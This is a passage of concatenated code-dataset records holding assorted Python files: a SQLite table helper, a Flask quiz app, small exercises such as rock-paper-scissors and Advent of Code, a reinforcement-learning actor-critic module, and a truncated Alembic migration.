_table_exists(self):\n ''' Check if this table exist in database '''\n query = 'SELECT name FROM sqlite_master WHERE type=\"table\" AND name=?'\n return self._conn.execute(query, [self._table_name]).fetchone()\\\n is not None\n\n def _create_table(self):\n ''' Create this table if not exists '''\n columns_def = ''\n foreigh = ''\n for key, value in self._columns.items(): # COLDEF\n # columname datatype primary key (columns)\n ctype = self._type_convert(value['type'])\n constraint = ''\n if key in self._primary:\n constraint += ' primary key'\n if value['default'] in ['AUTO', 'AUTOINCREMENT']:\n constraint += ' AUTOINCREMENT'\n else:\n constraint += ' DEFAULT {v1}'.format(v1=(\n str(value['default']) if value['type'] is not str\n else '\"{v}\"'.format(v=value['default'])\n ))\n columns_def += key + ' ' + ctype + constraint + ', '\n\n for key, value in self._foreigh_keys.items():\n # FOREIGN KEY(trackartist) REFERENCES artist(artistid)\n table, column = value.split('.', 2)\n foreigh += ', FOREIGN KEY({_key}) \\\n REFERENCES {_table}({_column}), '.format(\n _key=key,\n _table=table,\n _column=column)\n query = 'CREATE TABLE \\\n IF NOT EXISTS {table} ({coldef} {foreigh}) '.format(\n table=self._table_name,\n coldef=columns_def[:-2],\n foreigh=foreigh[:-2])\n cursor = self._conn.cursor()\n cursor.execute(query)\n self._conn.commit()\n\n def get_columns_name(self):\n ''' return columns names '''\n return self._columns.keys()\n\n def _type_convert(self, ctype):\n ''' Convert python type to sqlite type '''\n ctypes = {\n 'INTEGER': [int],\n 'BOOLEAN': [bool],\n 'REAL': [float],\n 'TEXT': [str, datetime],\n 'BLOB': [bytes]\n }\n for sqlite_type, python_types in ctypes.items():\n if ctype in python_types:\n return sqlite_type\n return 'BLOB'\n\n def _select_query(self, query):\n ''' assemble the select query '''\n where_stmt = []\n values = []\n for key, value in query.items():\n if key in self._columns.keys():\n where_stmt.append(key + ' = ? ')\n values.append(value)\n else:\n raise Exception('The column ' + cname + ' is not found.')\n nquery = 'SELECT {cols} FROM {table} {where}'.format(\n cols=\", \".join(self._columns.keys()),\n table=self._table_name,\n where='WHERE ' + ' AND '.join(where_stmt) if len(\n where_stmt) else '')\n return self._conn.execute(nquery, values)\n","sub_path":"core/dbtable.py","file_name":"dbtable.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"505781569","text":"# -*- coding: utf-8 -*-\nfrom flask import render_template, redirect, url_for, flash, request, abort, session\nfrom flask_login import current_user, login_required, current_app, login_user\nfrom . import exam\nimport pymysql\n\n'''\nquestion_list——选择题\njudge_list——判断题\nfill_list——填空题\n\nwrong_list——错误的选择题\nwrong_judge_list——错误的判断题\nwrong_fill_list——错误的填空题\n'''\n\n@exam.route('/', methods=['GET', 'POST'])\ndef index():\n # return render_template('index.html')\n id=1\n return redirect(url_for('.exam_page', id=id))\n\n# 选出考试题目\n@exam.route('/exam_page&id=', methods=['GET'])\ndef exam_page(id):\n # id = 5\n db = pymysql.connect('localhost', 'root', '970306', 'net_lesson', charset='utf8')\n cur = db.cursor()\n sql_choice = 'SELECT Question, Choice_a, Choice_b, Choice_c, Choice_d, Answer ' \\\n 'FROM choice_problems WHERE Lesson_id = %s ORDER BY rand() LIMIT 3;'\n sql_judge = 'SELECT Question, Answer FROM judge_problems ' \\\n 'WHERE Lesson_id = %s ORDER BY rand() LIMIT 2;'\n sql_fill = 'SELECT Question, Answer FROM fill_problems ' \\\n 'WHERE Lesson_id = %s ORDER BY rand() LIMIT 2;'\n\n cur.execute(sql_choice, (id))\n questions = cur.fetchall()\n\n question_list = []\n for question in questions:\n question_list.append(list(question))\n\n cur.execute(sql_judge, (id))\n questions = cur.fetchall()\n\n judge_list = []\n for question in questions:\n judge_list.append(list(question))\n\n cur.execute(sql_fill, (id))\n questions = cur.fetchall()\n\n fill_list = []\n for question in questions:\n fill_list.append(list(question))\n\n cur.close()\n db.close()\n session['question_list'] = question_list\n session['judge_list'] = judge_list\n session['fill_list'] = fill_list\n return render_template('exam.html', question_list=question_list,\n judge_list=judge_list, fill_list=fill_list)\n\n# 计算测试成绩\n@exam.route('/answer', methods=['POST'])\ndef answer():\n if request.method == \"POST\":\n # reply_list = []\n # for i in range(4):\n # reply_list.append(request.values.get('question' + str(i)))\n correct = 0 #计算正确的题目\n # 错误题目列表\n wrong_list = []\n wrong_judge_list = []\n wrong_fill_list = []\n\n # 选择题\n for i in range(len(session['question_list'])):\n # 判断单选题\n if len(session['question_list'][i][-1]) == 1:\n reply = request.values.get('question' + str(i))\n # 判断多选题正确与否\n else:\n reply_list = request.values.getlist('question' + str(i))\n reply = ''\n for re in reply_list:\n reply += re\n if session['question_list'][i][-1] == reply:\n correct += 1\n else:\n session['question_list'][i].append(reply)\n wrong_list.append(session['question_list'][i])\n\n # 判断题\n for i in range(len(session['judge_list'])):\n reply = request.values.get('judge' + str(i))\n if session['judge_list'][i][-1] == reply:\n correct += 1\n else:\n session['judge_list'][i].append(reply)\n wrong_judge_list.append(session['judge_list'][i])\n\n\n for i in range(len(session['fill_list'])):\n reply = request.values.get('fill' + str(i))\n if session['fill_list'][i][-1] == reply:\n correct += 1\n else:\n session['fill_list'][i].append(reply)\n wrong_fill_list.append(session['fill_list'][i])\n\n\n # score = correct / 4.0 * 100.0\n score = 50\n session.pop('question_list', None)\n session.pop('judge_list', None)\n session.pop('fill_list', None)\n # session['wrong_list'] = wrong_list\n # session['wrong_judge_list'] = wrong_judge_list\n # session['wrong_fill_list'] = wrong_fill_list\n # return render_template('answer.html', score=score)\n return render_template('review.html', score=score, wrong_list=wrong_list,\n wrong_judge_list=wrong_judge_list,\n wrong_fill_list=wrong_fill_list)\n\n# @exam.route('/review', methods=['POST'])\n# def review():\n# return render_template('review.html', wrong_list=session['wrong_list'],\n# wrong_judge_list=session['wrong_judge_list'],\n# wrong_fill_list=session['wrong_fill_list'])\n","sub_path":"app/exam/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"640456842","text":"from random import randrange\nnahodne_cislo = randrange (3)\ntah_hrac = input (\"zadej 'kamen', 'nuzky' nebo 'papir':\")\nwhile tah_hrac != \"konec\":\n while (tah_hrac != \"kamen\") and (tah_hrac != \"nuzky\") and (tah_hrac != \"papir\") and (tah_hrac != \"konec\"):\n print (\"sptane zadane, zkuste znova\")\n tah_hrac = input (\"zadej 'kamen', 'nuzky' nebo 'papir':\")\n\n\n\n\n#prirazeni kamen, nuzky nebo papir promenne tah_pocitac pomoci nahodneho cisla\n if nahodne_cislo == 0:\n tah_pocitac = \"kamen\"\n elif nahodne_cislo == 1:\n tah_pocitac = \"nuzky\"\n elif nahodne_cislo == 2:\n tah_pocitac = \"papir\"\n else:\n print (\"chyba v urceni nahodneho cisla\")\n print (\"pocitac vybral\", tah_pocitac)\n\n if ((tah_pocitac == \"kamen\" and tah_hrac == \"nuzky\") or (tah_pocitac == \"nuzky\"\\\n and tah_hrac == \"papir\") or (tah_pocitac == \"papir\" and tah_hrac == \"kamen\")):\n print (\"prohrals\")\n elif ((tah_pocitac == \"kamen\" and tah_hrac == \"papir\") or (tah_pocitac == \"nuzky\" and tah_hrac == \"kamen\") or (tah_pocitac == \"papir\" and tah_hrac == \"nuzky\")):\n print (\"vyhrals\")\n\n elif ((tah_pocitac == \"kamen\" and tah_hrac == \"kamen\") or (tah_pocitac == \"nuzky\" and tah_hrac == \"nuzky\") or (tah_pocitac == \"papir\" and tah_hrac == \"papir\")):\n print (\"plichta\")\n\n tah_hrac = input (\"zadej 'kamen', 'nuzky' nebo 'papir':\")\nprint (\"konec hry\")\n\n\nprint (\"diky za hru\")\n","sub_path":"05_ukoly/kamen.py","file_name":"kamen.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"588015046","text":"#!/usr/bin/env pypy3\n\n\"\"\"\n--- Day 17: Conway Cubes ---\nAs your flight slowly drifts through the sky, the Elves at the Mythical Information Bureau at the North Pole contact you. They'd like some help debugging a malfunctioning experimental energy source aboard one of their super-secret imaging satellites.\n\nThe experimental energy source is based on cutting-edge technology: a set of Conway Cubes contained in a pocket dimension! When you hear it's having problems, you can't help but agree to take a look.\n\nThe pocket dimension contains an infinite 3-dimensional grid. At every integer 3-dimensional coordinate (x,y,z), there exists a single cube which is either active or inactive.\n\nIn the initial state of the pocket dimension, almost all cubes start inactive. The only exception to this is a small flat region of cubes (your puzzle input); the cubes in this region start in the specified active (#) or inactive (.) state.\n\nThe energy source then proceeds to boot up by executing six cycles.\n\nEach cube only ever considers its neighbors: any of the 26 other cubes where any of their coordinates differ by at most 1. For example, given the cube at x=1,y=2,z=3, its neighbors include the cube at x=2,y=2,z=2, the cube at x=0,y=2,z=3, and so on.\n\nDuring a cycle, all cubes simultaneously change their state according to the following rules:\n\nIf a cube is active and exactly 2 or 3 of its neighbors are also active, the cube remains active. Otherwise, the cube becomes inactive.\nIf a cube is inactive but exactly 3 of its neighbors are active, the cube becomes active. Otherwise, the cube remains inactive.\nThe engineers responsible for this experimental energy source would like you to simulate the pocket dimension and determine what the configuration of cubes should be at the end of the six-cycle boot process.\n\nFor example, consider the following initial state:\n\n.#.\n..#\n###\nEven though the pocket dimension is 3-dimensional, this initial state represents a small 2-dimensional slice of it. (In particular, this initial state defines a 3x3x1 region of the 3-dimensional space.)\n\nSimulating a few cycles from this initial state produces the following configurations, where the result of each cycle is shown layer-by-layer at each given z coordinate (and the frame of view follows the active cells in each cycle):\n\nBefore any cycles:\n\nz=0\n.#.\n..#\n###\n\n\nAfter 1 cycle:\n\nz=-1\n#..\n..#\n.#.\n\nz=0\n#.#\n.##\n.#.\n\nz=1\n#..\n..#\n.#.\n\n\nAfter 2 cycles:\n\nz=-2\n.....\n.....\n..#..\n.....\n.....\n\nz=-1\n..#..\n.#..#\n....#\n.#...\n.....\n\nz=0\n##...\n##...\n#....\n....#\n.###.\n\nz=1\n..#..\n.#..#\n....#\n.#...\n.....\n\nz=2\n.....\n.....\n..#..\n.....\n.....\n\n\nAfter 3 cycles:\n\nz=-2\n.......\n.......\n..##...\n..###..\n.......\n.......\n.......\n\nz=-1\n..#....\n...#...\n#......\n.....##\n.#...#.\n..#.#..\n...#...\n\nz=0\n...#...\n.......\n#......\n.......\n.....##\n.##.#..\n...#...\n\nz=1\n..#....\n...#...\n#......\n.....##\n.#...#.\n..#.#..\n...#...\n\nz=2\n.......\n.......\n..##...\n..###..\n.......\n.......\n.......\nAfter the full six-cycle boot process completes, 112 cubes are left in the active state.\n\nStarting with your given initial configuration, simulate six cycles. How many cubes are left in the active state after the sixth cycle?\n\"\"\"\n\ndef remove( f, x, y, z ):\n if z not in f:\n return\n if y not in f[z]:\n return\n if x in f[z][y]:\n f[z][y].pop(x)\n if not f[z][y]:\n f[z].pop(y)\n if not f[z]:\n f.pop(z)\n\ndef add( f, x, y, z ):\n if z not in f:\n f[z] = {}\n if y not in f[z]:\n f[z][y] = {}\n f[z][y][x] = True\n\ndef get( f, x, y, z ):\n if z not in f:\n return False\n if y not in f[z]:\n return False\n return f[z][y].get(x, False)\n\ndef neighbors( f, x, y, z ):\n n = 0\n for dx in [-1, 0, 1]:\n for dy in [-1, 0, 1]:\n for dz in [-1, 0, 1]:\n if dx == dy == dz == 0:\n continue\n if get( f, x + dx, y + dy, z + dz ):\n n += 1\n return n\n \ndef evolve( f ):\n cf = {}\n minz, maxz = min( f.keys() ), max( f.keys() )\n miny, maxy, minx, maxx = 0, 0, 0, 0\n for z in f:\n miny, maxy = min( miny, *f[z].keys() ), max( maxy, *f[z].keys() )\n for y in f[z]:\n minx, maxx = min( minx, *f[z][y].keys() ), max( maxx, *f[z][y].keys() )\n for z in range(minz - 1, maxz + 2):\n for y in range(miny - 1, maxy + 2):\n for x in range(minx - 1, maxx + 2):\n if get( f, x, y, z ):\n n = neighbors( f, x, y, z )\n if n == 2 or n == 3:\n add( cf, x, y, z )\n else:\n if neighbors( f, x, y, z ) == 3:\n add( cf, x, y, z )\n return cf\n \n\ndef count( f ):\n c = 0\n for z in f:\n for y in f[z]:\n for x in f[z][y]:\n if f[z][y][x]:\n c += 1\n return c\n\ndata = []\n\nwith open(\"17.data\", \"r\") as f:\n for line in f:\n data.append(line.strip())\n\nf = {}\nfor y in range(len(data)):\n for x in range(len(data[y])):\n if data[y][x] == \"#\":\n add( f, x, y, 0 )\n\nfor i in range(6):\n f = evolve(f)\n\nprint(count(f))\n","sub_path":"adventofcode/2020/17a.py","file_name":"17a.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"128805338","text":"def turnLeft(lista,n): #左轉\n newtest = [[0] *n for i in range(n)] #陣列初始化 \n for i in range(n):\n for j in range(n):\n newtest[n-j-1][i] = lista[i][j]\n return newtest #回傳旋轉後結果\ndef turnUpAndDown(lista,n): #上下翻轉\n newtest = [[0] *n for i in range(n)] ##陣列初始化 \n newtest[:] = lista[::-1]\n return newtest #回傳旋轉後結果\ndef turnRight(lista,n): #右轉\n newtest = [[0] *n for i in range(n)] #陣列初始化\n for i in range(n):\n for j in range(n):\n newtest[j][n-i-1] = lista[i][j]\n return newtest #回傳旋轉後結果\ndef prinList(newtest,n): #印出最後結果\n for i in range(n):\n for j in range(n):\n print(newtest[i][j],sep=\"\",end=\" \")\n print()\ndef checkStatus(lista,turndata,n): #確認狀態\n for i in turndata:\n if(i=='L'):\n lista = turnLeft(lista,n)\n elif(i=='R'):\n lista = turnRight(lista,n)\n elif(i=='N'):\n lista = turnUpAndDown(lista,n)\n elif(i=='F'):\n prinList(lista,n)\ndef main():\n n = int(input()) #輸入N值\n turndata = [i for i in input().split()] #輸入 L R N旋轉\n data=1\n lista = [[] *n for i in range(n)] #創建n*n矩陣 #創建new n*n矩陣\n for i in range(n):\n for j in range(n):\n lista[i].append(data)\n data+=1\n checkStatus(lista,turndata,n)\nmain()","sub_path":"week3/Transfer.py","file_name":"Transfer.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"305856923","text":"def fibo():\n length_sequence = int(input(\"Input the length of the sequence: \"))\n sum=0\n num1=0\n num2=1\n\n print(\"Fibonacci Sequence:\")\n print(\"-------------------\")\n print(0)\n for i in range(0, length_sequence - 1):\n# fibonacci is the last two sums = to the new sum\n num1=num2\n num2=sum\n sum=num1+num2\n print(sum)\n\ndef abuntant():\n max_number = int(input(\"Input the max number to check: \"))\n sum1 = 0\n\n print(\"Abundant numbers:\")\n print(\"-----------------\")\n for i in range(1, max_number + 1):\n for p in range(1, i):\n if i % p == 0: # if the number that we are checking(i) is divisible p\n sum1 = sum1 + p\n if sum1 > i:\n print(i)\n sum1 = 0 #set the sum1 variable back to 0 for the next number\n\n\nchoice = input(\"Input f|a|b (fibonacci, abundant or both): \")\n\nif choice == \"f\":\n fibo()\nelif choice == \"a\":\n abuntant()\nelif choice == \"b\":\n fibo()\n\n abuntant()","sub_path":"fibo_abundant.py","file_name":"fibo_abundant.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"125234811","text":"\"\"\"This file is just for test purpose.\n\"\"\"\n\nfrom custom_logger import SksLogger\n\n# print(SksLogger.__doc__, \"\\n\")\n# print()\n\nlogger = SksLogger()\nlogger.set_log_name('sksdata-logs')\nlogger.set_log_level_threshold_name('INFO')\n\nlog_message = \"log entry 1\"\n\nlogger.fetch_logs(logger.log_name)\nprint()\n\n# logger.default(log_message)\n# logger.debug(log_message)\n# logger.info(log_message)\n# logger.notice(log_message)\n# logger.warning(log_message)\n# logger.error(log_message)\n# logger.critical(log_message)\n# logger.alert(log_message)\n# logger.emergency(log_message\n\n# wait for logs to pushed, before reading updated logs\n# import time; time.sleep(7)\n\n# print()\n# logger.fetch_logs(logger.log_name)\n\n# print()\n# #filter logs by level name\n# level_name = 'INFO'\n# logger.filter_logs_by_level_name(logger.log_name, level_name)\n\n# print()\n# search_key = 'entry 8'\n# logger.search_in_logs(logger.log_name, search_key)\n# print()\n# search_key = '2019-07-06'\n# logger.search_in_logs(logger.log_name, search_key, log_entry_field = 'timestamp')\n# print()\n\n# print(\"\\nclearing log entries ...\")\n# logger.clear_logs(logger.log_name)\n\n# # read logs from multipe projects\n# PROJECT_IDS = [\"cp-sksdata-dev\", \"another-project\"]\n# logger.fetch_logs_from_multiple_projects(PROJECT_IDS)\n","sub_path":"test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"199159136","text":"import numpy as np\nimport scipy.signal\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions.normal import Normal\nimport torch.distributions as D\nimport os\nimport math\nimport argparse\nimport pprint\nimport copy\n\n\ndevice = torch.device(\"cpu\")\ndef combined_shape(length, shape=None):\n if shape is None:\n return (length,)\n return (length, shape) if np.isscalar(shape) else (length, *shape)\n\ndef mlp(sizes, activation, output_activation=nn.Identity):\n layers = []\n for j in range(len(sizes)-1):\n act = activation if j < len(sizes)-2 else output_activation\n layers += [nn.Linear(sizes[j], sizes[j+1]), act()]\n return nn.Sequential(*layers)\n\ndef count_vars(module):\n return sum([np.prod(p.shape) for p in module.parameters()])\n\n\nLOG_STD_MAX = 2\nLOG_STD_MIN = -20\n\nclass SquashedGaussianMLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n self.net = mlp([obs_dim] + list(hidden_sizes), activation, activation)\n self.mu_layer = nn.Linear(hidden_sizes[-1], act_dim)\n self.log_std_layer = nn.Linear(hidden_sizes[-1], act_dim)\n self.act_limit = act_limit\n\n def forward(self, obs, deterministic=False, with_logprob=True):\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n log_std = self.log_std_layer(net_out)\n log_std = torch.clamp(log_std, LOG_STD_MIN, LOG_STD_MAX)\n std = torch.exp(log_std)\n\n # Pre-squash distribution and sample\n pi_distribution = Normal(mu, std)\n if deterministic:\n # Only used for evaluating policy at test time.\n pi_action = mu\n else:\n pi_action = pi_distribution.rsample()\n\n if with_logprob:\n # Compute logprob from Gaussian, and then apply correction for Tanh squashing.\n # NOTE: The correction formula is a little bit magic. To get an understanding \n # of where it comes from, check out the original SAC paper (arXiv 1801.01290) \n # and look in appendix C. This is a more numerically-stable equivalent to Eq 21.\n # Try deriving it yourself as a (very difficult) exercise. :)\n logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)\n logp_pi -= (2*(np.log(2) - pi_action - F.softplus(-2*pi_action))).sum(axis=1)\n else:\n logp_pi = None\n\n pi_action = torch.tanh(pi_action)\n pi_action = self.act_limit * pi_action\n\n return pi_action, logp_pi\n\n def get_logprob(self,obs, actions):\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n log_std = self.log_std_layer(net_out)\n log_std = torch.clamp(log_std, LOG_STD_MIN, LOG_STD_MAX)\n std = torch.exp(log_std)\n pi_distribution = Normal(mu, std)\n logp_pi = pi_distribution.log_prob(actions).sum(axis=-1)\n logp_pi -= (2*(np.log(2) - actions - F.softplus(-2*actions))).sum(axis=1)\n\n return logp_pi\n\n\n\n\nclass awacMLPActor(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation, act_limit):\n super().__init__()\n self.net = mlp([obs_dim] + list(hidden_sizes), activation, activation)\n self.mu_layer = nn.Linear(hidden_sizes[-1], act_dim)\n\n self.log_std_logits = nn.Parameter(\n torch.zeros(act_dim, requires_grad=True))\n self.min_log_std = -6\n self.max_log_std = 0\n # self.log_std_layer = nn.Linear(hidden_sizes[-1], act_dim)\n self.act_limit = act_limit\n\n def forward(self, obs, deterministic=False, with_logprob=True):\n # print(\"Using the special policy\")\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n mu = torch.tanh(mu) * self.act_limit\n\n log_std = torch.sigmoid(self.log_std_logits)\n \n log_std = self.min_log_std + log_std * (\n self.max_log_std - self.min_log_std)\n std = torch.exp(log_std)\n # print(\"Std: {}\".format(std))\n\n # Pre-squash distribution and sample\n pi_distribution = Normal(mu, std)\n if deterministic:\n # Only used for evaluating policy at test time.\n pi_action = mu\n else:\n pi_action = pi_distribution.rsample()\n\n if with_logprob:\n # Compute logprob from Gaussian, and then apply correction for Tanh squashing.\n # NOTE: The correction formula is a little bit magic. To get an understanding \n # of where it comes from, check out the original SAC paper (arXiv 1801.01290) \n # and look in appendix C. This is a more numerically-stable equivalent to Eq 21.\n # Try deriving it yourself as a (very difficult) exercise. :)\n logp_pi = pi_distribution.log_prob(pi_action).sum(axis=-1)\n # logp_pi -= (2*(np.log(2) - pi_action - F.softplus(-2*pi_action))).sum(axis=1)\n else:\n logp_pi = None\n\n\n return pi_action, logp_pi\n\n def get_logprob(self,obs, actions):\n net_out = self.net(obs)\n mu = self.mu_layer(net_out)\n mu = torch.tanh(mu) * self.act_limit\n log_std = torch.sigmoid(self.log_std_logits)\n # log_std = self.log_std_layer(net_out)\n log_std = self.min_log_std + log_std * (\n self.max_log_std - self.min_log_std)\n std = torch.exp(log_std)\n pi_distribution = Normal(mu, std)\n logp_pi = pi_distribution.log_prob(actions).sum(axis=-1)\n\n return logp_pi\n\n\n\n\nclass MLPVFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.v = mlp([obs_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs):\n v = self.v(obs)\n return torch.squeeze(v, -1) # Critical to ensure q has right shape.\n\nclass MLPQFunction(nn.Module):\n\n def __init__(self, obs_dim, act_dim, hidden_sizes, activation):\n super().__init__()\n self.q = mlp([obs_dim + act_dim] + list(hidden_sizes) + [1], activation)\n\n def forward(self, obs, act):\n q = self.q(torch.cat([obs, act], dim=-1))\n return torch.squeeze(q, -1) # Critical to ensure q has right shape.\n\nclass MLPActorCritic(nn.Module):\n\n def __init__(self, observation_space, action_space, hidden_sizes=(256,256),\n activation=nn.ReLU, special_policy=None):\n super().__init__()\n\n obs_dim = observation_space.shape[0]\n act_dim = action_space.shape[0]\n act_limit = action_space.high[0]\n # build policy and value functions\n if special_policy is 'awac':\n self.pi = awacMLPActor(obs_dim, act_dim, (256,256,256,256), activation, act_limit).to(device)\n else:\n self.pi = SquashedGaussianMLPActor(obs_dim, act_dim, hidden_sizes, activation, act_limit).to(device)\n self.q1 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n self.q2 = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n self.v = MLPVFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n\n\n def act_batch(self, obs, deterministic=False):\n with torch.no_grad():\n a, _ = self.pi(obs, deterministic, False)\n return a\n\n def act(self, obs, deterministic=False):\n with torch.no_grad():\n a, _ = self.pi(obs, deterministic, False)\n return a.cpu().data.numpy().flatten()\n\n\n\n\n\n# --------------------\n# Density estimator\n# Model layers and helpers\n# --------------------\n\ndef create_masks(input_size, hidden_size, n_hidden, input_order='sequential', input_degrees=None):\n # MADE paper sec 4:\n # degrees of connections between layers -- ensure at most in_degree - 1 connections\n degrees = []\n\n # set input degrees to what is provided in args (the flipped order of the previous layer in a stack of mades);\n # else init input degrees based on strategy in input_order (sequential or random)\n if input_order == 'sequential':\n degrees += [torch.arange(input_size)] if input_degrees is None else [input_degrees]\n for _ in range(n_hidden + 1):\n degrees += [torch.arange(hidden_size) % (input_size - 1)]\n degrees += [torch.arange(input_size) % input_size - 1] if input_degrees is None else [input_degrees % input_size - 1]\n\n elif input_order == 'random':\n degrees += [torch.randperm(input_size)] if input_degrees is None else [input_degrees]\n for _ in range(n_hidden + 1):\n min_prev_degree = min(degrees[-1].min().item(), input_size - 1)\n degrees += [torch.randint(min_prev_degree, input_size, (hidden_size,))]\n min_prev_degree = min(degrees[-1].min().item(), input_size - 1)\n degrees += [torch.randint(min_prev_degree, input_size, (input_size,)) - 1] if input_degrees is None else [input_degrees - 1]\n\n # construct masks\n masks = []\n for (d0, d1) in zip(degrees[:-1], degrees[1:]):\n masks += [(d1.unsqueeze(-1) >= d0.unsqueeze(0)).float()]\n\n return masks, degrees[0]\n\n\nclass MaskedLinear(nn.Linear):\n \"\"\" MADE building block layer \"\"\"\n def __init__(self, input_size, n_outputs, mask, cond_label_size=None):\n super().__init__(input_size, n_outputs)\n\n self.register_buffer('mask', mask)\n\n self.cond_label_size = cond_label_size\n if cond_label_size is not None:\n self.cond_weight = nn.Parameter(torch.rand(n_outputs, cond_label_size) / math.sqrt(cond_label_size))\n\n def forward(self, x, y=None):\n out = F.linear(x, self.weight * self.mask, self.bias)\n if y is not None:\n out = out + F.linear(y, self.cond_weight)\n return out\n\n def extra_repr(self):\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None\n ) + (self.cond_label_size != None) * ', cond_features={}'.format(self.cond_label_size)\n\n\nclass MADE(nn.Module):\n def __init__(self, input_size, hidden_size, n_hidden, cond_label_size=None, activation='relu', input_order='sequential', input_degrees=None):\n \"\"\"\n Args:\n input_size -- scalar; dim of inputs\n hidden_size -- scalar; dim of hidden layers\n n_hidden -- scalar; number of hidden layers\n activation -- str; activation function to use\n input_order -- str or tensor; variable order for creating the autoregressive masks (sequential|random)\n or the order flipped from the previous layer in a stack of mades\n conditional -- bool; whether model is conditional\n \"\"\"\n super().__init__()\n # base distribution for calculation of log prob under the model\n self.register_buffer('base_dist_mean', torch.zeros(input_size))\n self.register_buffer('base_dist_var', torch.ones(input_size))\n\n # create masks\n masks, self.input_degrees = create_masks(input_size, hidden_size, n_hidden, input_order, input_degrees)\n\n # setup activation\n if activation == 'relu':\n activation_fn = nn.ReLU()\n elif activation == 'tanh':\n activation_fn = nn.Tanh()\n else:\n raise ValueError('Check activation function.')\n\n # construct model\n self.net_input = MaskedLinear(input_size, hidden_size, masks[0], cond_label_size)\n self.net = []\n for m in masks[1:-1]:\n self.net += [activation_fn, MaskedLinear(hidden_size, hidden_size, m)]\n self.net += [activation_fn, MaskedLinear(hidden_size, 2 * input_size, masks[-1].repeat(2,1))]\n self.net = nn.Sequential(*self.net)\n\n @property\n def base_dist(self):\n return D.Normal(self.base_dist_mean, self.base_dist_var)\n\n def forward(self, x, y=None):\n # MAF eq 4 -- return mean and log std\n m, loga = self.net(self.net_input(x, y)).chunk(chunks=2, dim=1)\n u = (x - m) * torch.exp(-loga)\n # MAF eq 5\n log_abs_det_jacobian = - loga\n return u, log_abs_det_jacobian\n\n def inverse(self, u, y=None, sum_log_abs_det_jacobians=None):\n # MAF eq 3\n D = u.shape[1]\n x = torch.zeros_like(u)\n # run through reverse model\n for i in self.input_degrees:\n m, loga = self.net(self.net_input(x, y)).chunk(chunks=2, dim=1)\n x[:,i] = u[:,i] * torch.exp(loga[:,i]) + m[:,i]\n log_abs_det_jacobian = loga\n return x, log_abs_det_jacobian\n\n def log_prob(self, x, y=None):\n u, log_abs_det_jacobian = self.forward(x, y)\n return torch.sum(self.base_dist.log_prob(u) + log_abs_det_jacobian, dim=1)","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":12697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"579922840","text":"import rutermextract\nfrom resources import keywords\n\n\nclass PyMorpho:\n def __init__(self):\n self.termex = rutermextract.TermExtractor()\n self.true_keywords = keywords.final\n\n def generate_keywords_list(self, raw_text_data, limit, frequency):\n \"\"\" Generate keywords list from string\n term.normalized - keyword in text\n term.count - quantity of keyword in text\n \"\"\"\n keyword_count_dict = {}\n keywords = []\n\n for term in self.termex(raw_text_data, limit=limit):\n keyword_count_dict[term.normalized] = term.count\n\n for keyword, count in keyword_count_dict.items():\n if count > frequency:\n keywords.append(keyword)\n\n return keywords\n\n def format_user_keywords(self, user_keywords):\n return set(user_keywords) & set(self.true_keywords)\n\n def get_keywords_from_groups(self, groups, limit=40, frequency=2):\n \"\"\" Generate keywords list according to user groups \"\"\"\n preprocess_text_data = \"\"\n keyword_count_dict = {}\n user_groups_keywords = []\n for group in groups:\n try:\n preprocess_text_data += group['description'] + group['name']\n except Exception:\n pass\n\n for term in self.termex(preprocess_text_data, limit=limit):\n keyword_count_dict[term.normalized] = term.count\n\n for keyword, count in keyword_count_dict.items():\n if count > frequency:\n user_groups_keywords.append(keyword)\n\n return user_groups_keywords\n","sub_path":"keyword_extractor/PyMorpho.py","file_name":"PyMorpho.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"540596684","text":"\"\"\"empty message\n\nRevision ID: ef97ccd20ae6\nRevises: 7d5703fb9531\nCreate Date: 2021-11-08 18:37:19.999345\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ef97ccd20ae6'\ndown_revision = '7d5703fb9531'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('cart', 'product_id',\n existing_type=sa.INTEGER(),\n nullable=False)\n op.drop_constraint('cart_beauty_product_id_fkey', 'cart', type_='foreignkey')\n op.drop_column('cart', 'beauty_product_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('cart', sa.Column('beauty_product_id', sa.INTEGER(), 